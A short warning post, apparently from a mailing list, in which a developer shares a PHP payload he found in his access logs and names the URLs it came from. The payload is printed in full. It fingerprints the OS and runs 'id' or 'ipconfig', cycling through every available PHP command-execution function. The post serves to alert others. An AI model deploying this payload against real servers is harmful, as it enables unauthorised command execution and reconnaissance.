I am taking a quick look through the access logs on our dev box, and came across this little nasty that was trying to execute itself as a XSS attack(?) <? $ker = @php_uname(); $osx = @PHP_OS; echo "f7f32504cabcb48c21030c024c6e5c1a<br>"; echo "<h2>SysOSx:$ker</h2></br>"; echo "<h2>SysOSx:$osx</h2></br>"; if ($osx == "WINNT") { $xeQt="ipconfig -a"; } else { $xeQt="id"; } $hitemup=ex($xeQt); echo $hitemup; function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } ?> So far, it is coming from http://www.vesprokat.ru/n and http://www.goodasgold.com Be aware and check that your files are not vulnerable, although they are only going to get your users and groups info, as well as OS, you should all look out for this. --Paul
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